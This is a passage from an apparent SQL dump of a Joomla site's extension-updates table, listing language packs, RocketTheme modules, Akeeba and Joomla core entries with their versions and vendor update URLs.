Unitag','','pkg_ar-AA','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/ar-AA_details.xml','',''),(25490,3,0,'Catalan','','pkg_ca-ES','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/ca-ES_details.xml','',''),(25491,3,0,'Chinese Simplified','','pkg_zh-CN','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/zh-CN_details.xml','',''),(25492,3,0,'Croatian','','pkg_hr-HR','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/hr-HR_details.xml','',''),(25493,3,0,'Czech','','pkg_cs-CZ','package','',0,'3.9.22.2','','https://update.joomla.org/language/details3/cs-CZ_details.xml','',''),(25494,3,0,'Danish','','pkg_da-DK','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/da-DK_details.xml','',''),(25495,3,0,'Dutch','','pkg_nl-NL','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/nl-NL_details.xml','',''),(25496,3,0,'Estonian','','pkg_et-EE','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/et-EE_details.xml','',''),(25497,3,0,'Italian','','pkg_it-IT','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/it-IT_details.xml','',''),(25498,3,0,'Lithuanian','','pkg_lt-LT','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/lt-LT_details.xml','',''),(25499,3,0,'Persian','','pkg_fa-IR','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/fa-IR_details.xml','',''),(25500,3,0,'Polish','','pkg_pl-PL','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/pl-PL_details.xml','',''),(25501,3,0,'Portuguese','','pkg_pt-PT','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/pt-PT_details.xml','',''),(25502,3,0,'Russian','','pkg_ru-RU','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/ru-RU_details.xml','',''),(25503,3,0,'English AU','','pkg_en-AU','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/en-AU_details.xml','',''),(25504,3,0,'Slovak','','pkg_sk-SK','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/sk-SK_details.xml','',''),(25505,3,0,'English US','','pkg_en-US','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/en-US_details.xml','',''),(25506,3,0,'Swedish','','pkg_sv-SE','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/sv-SE_details.xml','',''),(25507,3,0,'Tamil','','pkg_ta-IN','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/ta-IN_details.xml','',''),(25508,3,0,'Thai','','pkg_th-TH','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/th-TH_details.xml','',''),(25509,3,0,'Ukrainian','','pkg_uk-UA','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/uk-UA_details.xml','',''),(25510,3,0,'Uyghur','','pkg_ug-CN','package','',0,'3.7.5.2','','https://update.joomla.org/language/details3/ug-CN_details.xml','',''),(25511,3,0,'German DE','','pkg_de-DE','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/de-DE_details.xml','',''),(25512,3,0,'Portuguese Brazil','','pkg_pt-BR','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/pt-BR_details.xml','',''),(25513,3,0,'Serbian Latin','','pkg_sr-YU','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/sr-YU_details.xml','',''),(25514,3,0,'Spanish','','pkg_es-ES','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/es-ES_details.xml','',''),(25515,3,0,'Bosnian','','pkg_bs-BA','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/bs-BA_details.xml','',''),(25516,3,0,'Serbian Cyrillic','','pkg_sr-RS','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/sr-RS_details.xml','',''),(25517,3,0,'Finnish','','pkg_fi-FI','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/fi-FI_details.xml','',''),(25518,3,0,'Swahili','','pkg_sw-KE','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/sw-KE_details.xml','',''),(25519,3,0,'English CA','','pkg_en-CA','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/en-CA_details.xml','',''),(25520,3,0,'Welsh','','pkg_cy-GB','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/cy-GB_details.xml','',''),(25521,3,0,'Dari Persian','','pkg_prs-AF','package','',0,'3.4.4.3','','https://update.joomla.org/language/details3/prs-AF_details.xml','',''),(25522,3,0,'Slovenian','','pkg_sl-SI','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/sl-SI_details.xml','',''),(25523,3,0,'Spanish CO','','pkg_es-CO','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/es-CO_details.xml','',''),(25524,3,0,'German CH','','pkg_de-CH','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/de-CH_details.xml','',''),(25525,3,0,'German AT','','pkg_de-AT','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/de-AT_details.xml','',''),(25526,3,0,'German LI','','pkg_de-LI','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/de-LI_details.xml','',''),(25527,3,0,'German LU','','pkg_de-LU','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/de-LU_details.xml','',''),(25528,3,0,'English NZ','','pkg_en-NZ','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/en-NZ_details.xml','',''),(25529,3,0,'Kazakh','','pkg_kk-KZ','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/kk-KZ_details.xml','',''),(25530,20,0,'RokSprocket Module','','mod_roksprocket','module','',0,'2.1.28','0802','http://updates.rockettheme.com/joomla/138/b61e70db','',''),(25531,20,0,'RokCommon Plugin','','','plugin','',0,'3.2.9','0802','http://updates.rockettheme.com/joomla/138/2084920890','',''),(25532,20,0,'RokGallery Extension','','mod_rokgallery','module','',0,'2.46','0802','http://updates.rockettheme.com/joomla/286/21ffe006','',''),(25533,20,0,'RokCommon Plugin','','','plugin','',0,'3.2.9','0802','http://updates.rockettheme.com/joomla/286/326466299','',''),(25534,20,0,'RokCandy Extension','','rokcandy','plugin','system',0,'2.0.4','0802','http://updates.rockettheme.com/joomla/302/2df8a4e2','',''),(25535,20,0,'RokGallery','','','component','',0,'2.46','0802','http://updates.rockettheme.com/joomla/313/1985305838','',''),(25536,20,0,'RokWeather','','','module','',0,'2.0.4','0802','http://updates.rockettheme.com/joomla/313/1307741342','',''),(25537,20,0,'RokMiniEvents','','','module','',0,'3.0.3','0802','http://updates.rockettheme.com/joomla/313/1301311221','',''),(25538,20,0,'RokCommon Plugin','','','plugin','',0,'3.2.9','0802','http://updates.rockettheme.com/joomla/381/337128173','',''),(25539,20,0,'RokCommon','','pkg_rokcommon','package','',0,'3.2.9','0802','http://updates.rockettheme.com/joomla/559/1033ef39','',''),(25540,57,0,'Romanian','','pkg_ro-RO','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/ro-RO_details.xml','',''),(25541,57,0,'Flemish','','pkg_nl-BE','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/nl-BE_details.xml','',''),(25542,57,0,'French','','pkg_fr-FR','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/fr-FR_details.xml','',''),(25543,57,0,'Georgian','','pkg_ka-GE','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/ka-GE_details.xml','',''),(25544,57,0,'Greek','','pkg_el-GR','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/el-GR_details.xml','',''),(25545,57,0,'Japanese','','pkg_ja-JP','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/ja-JP_details.xml','',''),(25546,57,0,'Hungarian','','pkg_hu-HU','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/hu-HU_details.xml','',''),(25547,57,0,'Afrikaans','','pkg_af-ZA','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/af-ZA_details.xml','',''),(25548,57,0,'Arabic Unitag','','pkg_ar-AA','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/ar-AA_details.xml','',''),(25549,57,0,'Catalan','','pkg_ca-ES','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/ca-ES_details.xml','',''),(25550,57,0,'Chinese Simplified','','pkg_zh-CN','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/zh-CN_details.xml','',''),(25551,57,0,'Croatian','','pkg_hr-HR','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/hr-HR_details.xml','',''),(25552,57,0,'Czech','','pkg_cs-CZ','package','',0,'3.9.22.2','','https://update.joomla.org/language/details3/cs-CZ_details.xml','',''),(25553,57,0,'Danish','','pkg_da-DK','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/da-DK_details.xml','',''),(25554,57,0,'Dutch','','pkg_nl-NL','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/nl-NL_details.xml','',''),(25555,57,0,'Estonian','','pkg_et-EE','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/et-EE_details.xml','',''),(25556,57,0,'Italian','','pkg_it-IT','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/it-IT_details.xml','',''),(25557,57,0,'Lithuanian','','pkg_lt-LT','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/lt-LT_details.xml','',''),(25558,57,0,'Persian','','pkg_fa-IR','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/fa-IR_details.xml','',''),(25559,57,0,'Polish','','pkg_pl-PL','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/pl-PL_details.xml','',''),(25560,57,0,'Portuguese','','pkg_pt-PT','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/pt-PT_details.xml','',''),(25561,57,0,'Russian','','pkg_ru-RU','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/ru-RU_details.xml','',''),(25562,57,0,'English AU','','pkg_en-AU','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/en-AU_details.xml','',''),(25563,57,0,'Slovak','','pkg_sk-SK','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/sk-SK_details.xml','',''),(25564,57,0,'English US','','pkg_en-US','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/en-US_details.xml','',''),(25565,57,0,'Swedish','','pkg_sv-SE','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/sv-SE_details.xml','',''),(25566,57,0,'Tamil','','pkg_ta-IN','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/ta-IN_details.xml','',''),(25567,57,0,'Thai','','pkg_th-TH','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/th-TH_details.xml','',''),(25568,57,0,'Ukrainian','','pkg_uk-UA','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/uk-UA_details.xml','',''),(25569,57,0,'Uyghur','','pkg_ug-CN','package','',0,'3.7.5.2','','https://update.joomla.org/language/details3/ug-CN_details.xml','',''),(25570,57,0,'German DE','','pkg_de-DE','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/de-DE_details.xml','',''),(25571,57,0,'Portuguese Brazil','','pkg_pt-BR','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/pt-BR_details.xml','',''),(25572,57,0,'Serbian Latin','','pkg_sr-YU','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/sr-YU_details.xml','',''),(25573,57,0,'Spanish','','pkg_es-ES','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/es-ES_details.xml','',''),(25574,57,0,'Bosnian','','pkg_bs-BA','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/bs-BA_details.xml','',''),(25575,57,0,'Serbian Cyrillic','','pkg_sr-RS','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/sr-RS_details.xml','',''),(25576,57,0,'Finnish','','pkg_fi-FI','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/fi-FI_details.xml','',''),(25577,57,0,'Swahili','','pkg_sw-KE','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/sw-KE_details.xml','',''),(25578,57,0,'English CA','','pkg_en-CA','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/en-CA_details.xml','',''),(25579,57,0,'Welsh','','pkg_cy-GB','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/cy-GB_details.xml','',''),(25580,57,0,'Dari Persian','','pkg_prs-AF','package','',0,'3.4.4.3','','https://update.joomla.org/language/details3/prs-AF_details.xml','',''),(25581,57,0,'Slovenian','','pkg_sl-SI','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/sl-SI_details.xml','',''),(25582,57,0,'Spanish CO','','pkg_es-CO','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/es-CO_details.xml','',''),(25583,57,0,'German CH','','pkg_de-CH','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/de-CH_details.xml','',''),(25584,57,0,'German AT','','pkg_de-AT','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/de-AT_details.xml','',''),(25585,57,0,'German LI','','pkg_de-LI','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/de-LI_details.xml','',''),(25586,57,0,'German LU','','pkg_de-LU','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/de-LU_details.xml','',''),(25587,57,0,'English NZ','','pkg_en-NZ','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/en-NZ_details.xml','',''),(25588,57,0,'Kazakh','','pkg_kk-KZ','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/kk-KZ_details.xml','',''),(25589,76,0,'Akeeba Frontend Framework (FEF)','','file_fef','file','',1,'1.1.1','','http://cdn.akeebabackup.com/updates/fef.xml','https://www.akeeba.com/download/fef/1-1-1.html',''),(25590,93,0,'Regular Labs - Sourcerer','','sourcerer','plugin','system',0,'8.4.3FREE','','https://download.regularlabs.com/updates.xml?e=sourcerer&type=.xml','https://www.regularlabs.com/extensions/sourcerer/features',''),(25591,101,0,'FOF 3.x Stable','','lib_fof30','library','',1,'3.7.1','','http://cdn.akeebabackup.com/updates/fof3_file.xml','https://www.akeeba.com/download/fof3/3-7-1.html',''),(25593,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'7.5.0.1','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/7-5-0-1.html',''),(25594,1,0,'Joomla','','joomla','file','',0,'3.9.23','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(25595,1,0,'Joomla','','joomla','file','',0,'3.9.23','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(25596,1,0,'Joomla','','joomla','file','',0,'3.9.23','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(25597,3,0,'Romanian','','pkg_ro-RO','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/ro-RO_details.xml','',''),(25598,3,0,'Flemish','','pkg_nl-BE','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/nl-BE_details.xml','',''),(25599,3,0,'French','','pkg_fr-FR','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/fr-FR_details.xml','',''),(25600,3,0,'Georgian','','pkg_ka-GE','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/ka-GE_details.xml','',''),(25601,3,0,'Greek','','pkg_el-GR','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/el-GR_details.xml','',''),(25602,3,0,'Japanese','','pkg_ja-JP','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/ja-JP_details.xml','',''),(25603,3,0,'Hungarian','','pkg_hu-HU','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/hu-HU_details.xml','',''),(25604,3,0,'Afrikaans','','pkg_af-ZA','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/af-ZA_details.xml','',''),(25605,3,0,'Arabic Unitag','','pkg_ar-AA','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/ar-AA_details.xml','',''),(25606,3,0,'Catalan','','pkg_ca-ES','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/ca-ES_details.xml','',''),(25607,3,0,'Chinese Simplified','','pkg_zh-CN','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/zh-CN_details.xml','',''),(25608,3,0,'Croatian','','pkg_hr-HR','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/hr-HR_details.xml','',''),(25609,3,0,'Czech','','pkg_cs-CZ','package','',0,'3.9.22.2','','https://update.joomla.org/language/details3/cs-CZ_details.xml','',''),(25610,3,0,'Danish','','pkg_da-DK','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/da-DK_details.xml','',''),(25611,3,0,'Dutch','','pkg_nl-NL','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/nl-NL_details.xml','',''),(25612,3,0,'Estonian','','pkg_et-EE','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/et-EE_details.xml','',''),(25613,3,0,'Italian','','pkg_it-IT','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/it-IT_details.xml','',''),(25614,3,0,'Lithuanian','','pkg_lt-LT','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/lt-LT_details.xml','',''),(25615,3,0,'Persian','','pkg_fa-IR','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/fa-IR_details.xml','',''),(25616,3,0,'Polish','','pkg_pl-PL','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/pl-PL_details.xml','',''),(25617,3,0,'Portuguese','','pkg_pt-PT','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/pt-PT_details.xml','',''),(25618,3,0,'Russian','','pkg_ru-RU','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/ru-RU_details.xml','',''),(25619,3,0,'English AU','','pkg_en-AU','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/en-AU_details.xml','',''),(25620,3,0,'Slovak','','pkg_sk-SK','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/sk-SK_details.xml','',''),(25621,3,0,'English US','','pkg_en-US','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/en-US_details.xml','',''),(25622,3,0,'Swedish','','pkg_sv-SE','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/sv-SE_details.xml','',''),(25623,3,0,'Tamil','','pkg_ta-IN','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/ta-IN_details.xml','',''),(25624,3,0,'Thai','','pkg_th-TH','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/th-TH_details.xml','',''),(25625,3,0,'Ukrainian','','pkg_uk-UA','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/uk-UA_details.xml','',''),(25626,3,0,'Uyghur','','pkg_ug-CN','package','',0,'3.7.5.2','','https://update.joomla.org/language/details3/ug-CN_details.xml','',''),(25627,3,0,'German DE','','pkg_de-DE','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/de-DE_details.xml','',''),(25628,3,0,'Portuguese Brazil','','pkg_pt-BR','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/pt-BR_details.xml','',''),(25629,3,0,'Serbian Latin','','pkg_sr-YU','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/sr-YU_details.xml','',''),(25630,3,0,'Spanish','','pkg_es-ES','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/es-ES_details.xml','',''),(25631,3,0,'Bosnian','','pkg_bs-BA','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/bs-BA_details.xml','',''),(25632,3,0,'Serbian Cyrillic','','pkg_sr-RS','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/sr-RS_details.xml','',''),(25633,3,0,'Finnish','','pkg_fi-FI','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/fi-FI_details.xml','',''),(25634,3,0,'Swahili','','pkg_sw-KE','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/sw-KE_details.xml','',''),(25635,3,0,'English CA','','pkg_en-CA','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/en-CA_details.xml','',''),(25636,3,0,'Welsh','','pkg_cy-GB','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/cy-GB_details.xml','',''),(25637,3,0,'Dari Persian','','pkg_prs-AF','package','',0,'3.4.4.3','','https://update.joomla.org/language/details3/prs-AF_details.xml','',''),(25638,3,0,'Slovenian','','pkg_sl-SI','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/sl-SI_details.xml','',''),(25639,3,0,'Spanish CO','','pkg_es-CO','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/es-CO_details.xml','',''),(25640,3,0,'German CH','','pkg_de-CH','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/de-CH_details.xml','',''),(25641,3,0,'German AT','','pkg_de-AT','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/de-AT_details.xml','',''),(25642,3,0,'German LI','','pkg_de-LI','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/de-LI_details.xml','',''),(25643,3,0,'German LU','','pkg_de-LU','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/de-LU_details.xml','',''),(25644,3,0,'English NZ','','pkg_en-NZ','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/en-NZ_details.xml','',''),(25645,3,0,'Kazakh','','pkg_kk-KZ','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/kk-KZ_details.xml','',''),(25646,20,0,'RokSprocket Module','','mod_roksprocket','module','',0,'2.1.28','0802','http://updates.rockettheme.com/joomla/138/b61e70db','',''),(25647,20,0,'RokCommon Plugin','','','plugin','',0,'3.2.9','0802','http://updates.rockettheme.com/joomla/138/2084920890','',''),(25648,20,0,'RokGallery Extension','','mod_rokgallery','module','',0,'2.46','0802','http://updates.rockettheme.com/joomla/286/21ffe006','',''),(25649,20,0,'RokCommon Plugin','','','plugin','',0,'3.2.9','0802','http://updates.rockettheme.com/joomla/286/326466299','',''),(25650,20,0,'RokCandy Extension','','rokcandy','plugin','system',0,'2.0.4','0802','http://updates.rockettheme.com/joomla/302/2df8a4e2','',''),(25651,20,0,'RokGallery','','','component','',0,'2.46','0802','http://updates.rockettheme.com/joomla/313/1985305838','',''),(25652,20,0,'RokWeather','','','module','',0,'2.0.4','0802','http://updates.rockettheme.com/joomla/313/1307741342','',''),(25653,20,0,'RokMiniEvents','','','module','',0,'3.0.3','0802','http://updates.rockettheme.com/joomla/313/1301311221','',''),(25654,20,0,'RokCommon Plugin','','','plugin','',0,'3.2.9','0802','http://updates.rockettheme.com/joomla/381/337128173','',''),(25655,20,0,'RokCommon','','pkg_rokcommon','package','',0,'3.2.9','0802','http://updates.rockettheme.com/joomla/559/1033ef39','',''),(25656,57,0,'Romanian','','pkg_ro-RO','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/ro-RO_details.xml','',''),(25657,57,0,'Flemish','','pkg_nl-BE','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/nl-BE_details.xml','',''),(25658,57,0,'French','','pkg_fr-FR','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/fr-FR_details.xml','',''),(25659,57,0,'Georgian','','pkg_ka-GE','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/ka-GE_details.xml','',''),(25660,57,0,'Greek','','pkg_el-GR','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/el-GR_details.xml','',''),(25661,57,0,'Japanese','','pkg_ja-JP','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/ja-JP_details.xml','',''),(25662,57,0,'Hungarian','','pkg_hu-HU','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/hu-HU_details.xml','',''),(25663,57,0,'Afrikaans','','pkg_af-ZA','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/af-ZA_details.xml','',''),(25664,57,0,'Arabic Unitag','','pkg_ar-AA','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/ar-AA_details.xml','',''),(25665,57,0,'Catalan','','pkg_ca-ES','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/ca-ES_details.xml','',''),(25666,57,0,'Chinese Simplified','','pkg_zh-CN','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/zh-CN_details.xml','',''),(25667,57,0,'Croatian','','pkg_hr-HR','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/hr-HR_details.xml','',''),(25668,57,0,'Czech','','pkg_cs-CZ','package','',0,'3.9.22.2','','https://update.joomla.org/language/details3/cs-CZ_details.xml','',''),(25669,57,0,'Danish','','pkg_da-DK','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/da-DK_details.xml','',''),(25670,57,0,'Dutch','','pkg_nl-NL','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/nl-NL_details.xml','',''),(25671,57,0,'Estonian','','pkg_et-EE','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/et-EE_details.xml','',''),(25672,57,0,'Italian','','pkg_it-IT','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/it-IT_details.xml','',''),(25673,57,0,'Lithuanian','','pkg_lt-LT','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/lt-LT_details.xml','',''),(25674,57,0,'Persian','','pkg_fa-IR','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/fa-IR_details.xml','',''),(25675,57,0,'Polish','','pkg_pl-PL','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/pl-PL_details.xml','',''),(25676,57,0,'Portuguese','','pkg_pt-PT','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/pt-PT_details.xml','',''),(25677,57,0,'Russian','','pkg_ru-RU','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/ru-RU_details.xml','',''),(25678,57,0,'English AU','','pkg_en-AU','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/en-AU_details.xml','',''),(25679,57,0,'Slovak','','pkg_sk-SK','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/sk-SK_details.xml','',''),(25680,57,0,'English US','','pkg_en-US','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/en-US_details.xml','',''),(25681,57,0,'Swedish','','pkg_sv-SE','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/sv-SE_details.xml','',''),(25682,57,0,'Tamil','','pkg_ta-IN','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/ta-IN_details.xml','',''),(25683,57,0,'Thai','','pkg_th-TH','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/th-TH_details.xml','',''),(25684,57,0,'Ukrainian','','pkg_uk-UA','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/uk-UA_details.xml','',''),(25685,57,0,'Uyghur','','pkg_ug-CN','package','',0,'3.7.5.2','','https://update.joomla.org/language/details3/ug-CN_details.xml','',''),(25686,57,0,'German DE','','pkg_de-DE','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/de-DE_details.xml','',''),(25687,57,0,'Portuguese Brazil','','pkg_pt-BR','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/pt-BR_details.xml','',''),(25688,57,0,'Serbian Latin','','pkg_sr-YU','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/sr-YU_details.xml','',''),(25689,57,0,'Spanish','','pkg_es-ES','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/es-ES_details.xml','',''),(25690,57,0,'Bosnian','','pkg_bs-BA','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/bs-BA_details.xml','',''),(25691,57,0,'Serbian Cyrillic','','pkg_sr-RS','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/sr-RS_details.xml','',''),(25692,57,0,'Finnish','','pkg_fi-FI','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/fi-FI_details.xml','',''),(25693,57,0,'Swahili','','pkg_sw-KE','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/sw-KE_details.xml','',''),(25694,57,0,'English CA','','pkg_en-CA','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/en-CA_details.xml','',''),(25695,57,0,'Welsh','','pkg_cy-GB','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/cy-GB_details.xml','',''),(25696,57,0,'Dari Persian','','pkg_prs-AF','package','',0,'3.4.4.3','','https://update.joomla.org/language/details3/prs-AF_details.xml','',''),(25697,57,0,'Slovenian','','pkg_sl-SI','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/sl-SI_details.xml','',''),(25698,57,0,'Spanish CO','','pkg_es-CO','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/es-CO_details.xml','',''),(25699,57,0,'German CH','','pkg_de-CH','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/de-CH_details.xml','',''),(25700,57,0,'German AT','','pkg_de-AT','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/de-AT_details.xml','',''),(25701,57,0,'German LI','','pkg_de-LI','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/de-LI_details.xml','',''),(25702,57,0,'German LU','','pkg_de-LU','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/de-LU_details.xml','',''),(25703,57,0,'English NZ','','pkg_en-NZ','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/en-NZ_details.xml','',''),(25704,57,0,'Kazakh','','pkg_kk-KZ','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/kk-KZ_details.xml','',''),(25705,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'7.5.0.1','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/7-5-0-1.html',''),(25706,76,0,'Akeeba Frontend Framework 